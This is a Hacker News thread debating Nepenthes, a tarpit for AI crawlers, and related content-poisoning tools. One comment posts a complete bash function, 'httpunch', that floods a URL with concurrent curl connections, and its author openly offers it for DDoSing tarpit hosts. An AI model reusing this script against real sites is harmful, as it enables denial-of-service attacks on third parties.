Nepenthes is a tarpit to catch AI web crawlers

1. quchen ◴[16 Jan 25 14:32 UTC] No.42725651[source]▶

Unless this concept becomes a mass phenomenon with many implementations, isn’t this pretty easy to filter out? And furthermore, since this antagonizes billion-dollar companies that can spin up teams doing nothing but browse Github and HN for software like this to prevent polluting their datalakes, I wonder whether this is a very efficient approach.

replies(9): >>42725708 #>>42725957 #>>42725983 #>>42726183 #>>42726352 #>>42726426 #>>42727567 #>>42728923 #>>42730108 #

2. grajaganDev ◴[16 Jan 25 14:35 UTC] No.42725708[source]▶

>>42725651 (TP) #

I am not sure. How would crawlers filter this?

replies(2): >>42725835 #>>42726294 #

3. captainmuon ◴[16 Jan 25 14:43 UTC] No.42725835[source]▶

>>42725708 #

Check if the response time, the length of the "main text", or other indicators are in the lowest few percentile -> send to the heap for manual review.

Does the inferred "topic" of the domain match the topic of the individual pages? If not -> manual review. And there are many more indicators.

Hire a bunch of student jobbers, have them search github for tarpits, and let them write middleware to detect those.

If you are doing broad crawling, you already need to do this kind of thing anyway.

replies(1): >>42727490 #

4. Blackthorn ◴[16 Jan 25 14:51 UTC] No.42725957[source]▶

>>42725651 (TP) #

If it means it makes your own content safe when you deploy it on a corner of your website: mission accomplished!

replies(2): >>42726400 #>>42727416 #

5. btilly ◴[16 Jan 25 14:53 UTC] No.42725983[source]▶

>>42725651 (TP) #

It would be more efficient for them to spin up a team to study this robots.txt thing. They've ignored that low hanging fruit, so they won't do the more sophisticated thing any time soon.

replies(1): >>42726821 #

6. focusedone ◴[16 Jan 25 15:03 UTC] No.42726183[source]▶

>>42725651 (TP) #

But it's fun, right?

7. marginalia_nu ◴[16 Jan 25 15:10 UTC] No.42726294[source]▶

>>42725708 #

You limit the crawl time or number of requests per domain for all domains, and set the limit proportional to how important the domain is.

There's a ton of these types of of things online, you can't e.g. exhaustively crawl every wikipedia mirror someone's put online.

8. reedf1 ◴[16 Jan 25 15:14 UTC] No.42726352[source]▶

>>42725651 (TP) #

The idea is that you place this in parallel to the rest of your website routes, that way your entire server might get blacklisted by the bot.

9. gruez ◴[16 Jan 25 15:17 UTC] No.42726400[source]▶

>>42725957 #

>If it means it makes your own content safe

Not really? As mentioned by others, such tarpits are easily mitigated by using a priority queue. For instance, crawlers can prioritize external links over internal links, which means if your blog post makes it to HN, it'll get crawled ahead of the tarpit. If it's discoverable and readable by actual humans, AI bots will be able to scrape it.

10. marcus0x62 ◴[16 Jan 25 15:19 UTC] No.42726426[source]▶

>>42725651 (TP) #

Author of a similar tool here[0]. There are a few implementations of this sort of thing that I know of. Mine is different in that the primary purpose is to slightly alter content statically using a Markov generator, mainly to make it useless for content reposters, secondarily to make it useless to LLM crawlers that ignore my robots.txt file[1]. I assume the generated text is bad enough that the LLM crawlers just throw the result out. Other than the extremely poor quality of the text, my tool doesn't leave any fingerprints (like recursive non-sense links.) In any case, it can be run on static sites with no server-side dependencies so long as you have a way to do content redirection based on User-Agent, IP, etc.

My tool does have a second component - linkmaze - which generates a bunch of nonsense text with a Markov generator, and serves infinite links (like Nepthenes does) but I generally only throw incorrigible bots at it (and, at others have noted in-thread, most crawlers already set some kind of limit on how many requests they'll send to a given site, especially a small site.) I do use it for PHP-exploit crawlers as well, though I've seen no evidence those fall into the maze -- I think they mostly just look for some string indicating a successful exploit and move on if whatever they're looking for isn't present.

But, for my use case, I don't really care if someone fingerprints content generated by my tool and avoids it. That's the point: I've set robots.txt to tell these people not to crawl my site.

In addition to Quixotic (my tool) and Napthenes, I know of:

* https://github.com/Fingel/django-llm-poison

* https://codeberg.org/MikeCoats/poison-the-wellms

* https://codeberg.org/timmc/marko/

0 - https://marcusb.org/hacks/quixotic.html

1 - I use the ai.robots.txt user agent list from https://github.com/ai-robots-txt/ai.robots.txt

replies(1): >>42743157 #

11. tgv ◴[16 Jan 25 15:46 UTC] No.42726821[source]▶

>>42725983 #

You can't make money out of studying robots.txt, but you can avoid costs skipping bad web sites.

replies(1): >>42730213 #

12. dylan604 ◴[16 Jan 25 16:31 UTC] No.42727490{3}[source]▶

>>42725835 #

> Hire a bunch of student jobbers,

Do people still do this, or do they just off shore the task?

13. WD-42 ◴[16 Jan 25 16:37 UTC] No.42727567[source]▶

>>42725651 (TP) #

Does it need to be efficient if it’s easy? I wrote a similar tool except it’s not a performance tarpit. The goal is to slightly modify otherwise organic content so that it is wrong, but only for AI bots. If they catch on and stop crawling the site, nothing is lost. https://github.com/Fingel/django-llm-poison

14. Blackthorn ◴[16 Jan 25 17:25 UTC] No.42728175{3}[source]▶

>>42727416 #

You've got to be seriously AI-drunk to equate letting your site be crawled by commercial scrapers with "contributing to humanity".

Maybe you don't want your your stuff to get thrown into the latest silicon valley commercial operation without getting paid for it. That seems like a valid position to take. Or maybe you just don't want Claude's ridiculously badly behaved scraper to chew through your entire budget.

Regardless, scrapers that don't follow the rules like robots.txt pretty quickly will discover why those rules exist in the first place as they receive increasing amounts of garbage.

15. iugtmkbdfil834 ◴[16 Jan 25 18:24 UTC] No.42728923[source]▶

>>42725651 (TP) #

I forget which fiction book covered this phenomenon ( Rainbow's End? ), but the moment it becomes the basic default install ( ala adblocker in browsers for people ), it does not matter what the bigger players want to do ; they are not actively fighting against determined and possibly radicalized users.

16. pmarreck ◴[16 Jan 25 19:58 UTC] No.42730108[source]▶

>>42725651 (TP) #

It's not. It's rather pointless and frankly, nearsighted. And we can DDoS sites like this just as offensively as well simply by making many requests to it since its own docs say its Markov generation is computationally expensive, but it is NOT expensive for even 1 person to make many requests to it. Just expensive to host. So feel free to use this bash function to defeat these:

    httpunch() {
      local url=$1
      local connections=${2:-${HTTPUNCH_CONNECTIONS:-100}}
      local action=$1
      local keepalive_time=${HTTPUNCH_KEEPALIVE:-60}
      local silent_mode=false

      # Check if "kill" was passed as the first argument
      if [[ $action == "kill" ]]; then
        echo "Killing all curl processes..."
        pkill -f "curl --no-buffer"
        return
      fi

      # Parse optional --silent argument
      for arg in "$@"; do
        if [[ $arg == "--silent" ]]; then
          silent_mode=true
          break
        fi
      done

      # Ensure URL is provided if "kill" is not used
      if [[ -z $url ]]; then
        echo "Usage: httpunch [kill | <url>] [number_of_connections] [--silent]"
        echo "Environment variables: HTTPUNCH_CONNECTIONS (default: 100), HTTPUNCH_KEEPALIVE (default: 60)."
        return 1
      fi

      echo "Starting $connections connections to $url..."
      for ((i = 1; i <= connections; i++)); do
        if $silent_mode; then
          curl --no-buffer --silent --output /dev/null --keepalive-time "$keepalive_time" "$url" &
        else
          curl --no-buffer --keepalive-time "$keepalive_time" "$url" &
        fi
      done

      echo "$connections connections started with a keepalive time of $keepalive_time seconds."
      echo "Use 'httpunch kill' to terminate them."
    }

(Generated in a few seconds with the help of an LLM of course.) Your free speech is also my free speech. LLM's are just a very useful tool, and Llama for example is open-source and also needs to be trained on data. And I <opinion> just can't stand knee-jerk-anticorporate AI-doomers who decide to just create chaos instead of using that same energy to try to steer the progress </opinion>.

replies(4): >>42730700 #>>42732664 #>>42742525 #>>42746008 #

17. xeromal ◴[16 Jan 25 20:06 UTC] No.42730213{3}[source]▶

>>42726821 #

Sounds like a benefit for the site owner. lol. It accomplished what they wanted.

18. WD-42 ◴[16 Jan 25 20:47 UTC] No.42730700[source]▶

>>42730108 #

You called the parent unintelligent yet need an LLM to show you how to run curl in a loop. Yikes.

replies(3): >>42735751 #>>42737351 #>>42742559 #

19. scudsworth ◴[17 Jan 25 00:22 UTC] No.42732664[source]▶

>>42730108 #

"Ah, my favorite ADD tech nomad! adjusts monocle"

- https://gist.github.com/pmarreck/970e5d040f9f91fd9bce8a4bcee...

20. flir ◴[17 Jan 25 09:39 UTC] No.42735751{3}[source]▶

>>42730700 #

"I'm not lazy, I'm efficient" - Heinlein

21. thruway516 ◴[17 Jan 25 13:35 UTC] No.42737351{3}[source]▶

>>42730700 #

The 21st century script kiddy

replies(1): >>42742624 #

22. SrslyJosh ◴[17 Jan 25 19:52 UTC] No.42742525[source]▶

>>42730108 #

[flagged]

replies(1): >>42742586 #

23. pmarreck ◴[17 Jan 25 19:55 UTC] No.42742559{3}[source]▶

>>42730700 #

Your assumption that I couldn't have written this myself or that I didn't make corrections to it is telling. I've only been doing dev for 30+ years lol

LLMs are an accelerant, like all previous tools... Not a replacement, although it seems most people still need to figure that out for themselves while I already have

replies(2): >>42744153 #>>42746411 #

24. pmarreck ◴[17 Jan 25 19:57 UTC] No.42742586{3}[source]▶

>>42742525 #

The only actual child is OP or anyone who actually believes their tarpit is going to be effective at stopping LLMs

25. pmarreck ◴[17 Jan 25 20:00 UTC] No.42742624{4}[source]▶

>>42737351 #

https://news.ycombinator.com/item?id=42742559

26. tremon ◴[17 Jan 25 20:58 UTC] No.42743157[source]▶

>>42726426 #

poison-the-wellms

I gotta give props for this project name.

27. dilDDoS ◴[17 Jan 25 23:02 UTC] No.42744153{4}[source]▶

>>42742559 #

Sure, but in this case it's like driving your car 10 feet to your mailbox and then bragging about how it's an accelerant (in other words, the task wasn't remotely difficult to begin with and doesn't really warrant "accelerating"). I assume in this case your note about how it was written with an LLM was more just to spite the anti-LLM sentiment above though, which would make more sense.

replies(1): >>42745642 #

28. pmarreck ◴[18 Jan 25 03:48 UTC] No.42745642{5}[source]▶

>>42744153 #

That's exactly what it was meant to do. You're right, this is a trivial use case.

29. alt187 ◴[18 Jan 25 05:06 UTC] No.42746008[source]▶

>>42730108 #

The tarpit is made for LLM crawlers who don't respect robots.txt. Do you love LLMs so much that you wish that they wouldn't have to respect this stupid, anticorporate AI-doomer robots.txt convention so they can pry out of the greedy hands of the webserver one more URL?

Maybe you just had a knee-jerk reaction.

30. WD-42 ◴[18 Jan 25 06:47 UTC] No.42746411{4}[source]▶

>>42742559 #

I see you edited out the part where you made fun of the author using Lua and then called them stupid. It’s a bad look, especially using all that space to paste a script that could be reduced to 5 lines, which is pretty typical of the slop that the author has an issue with in the first place.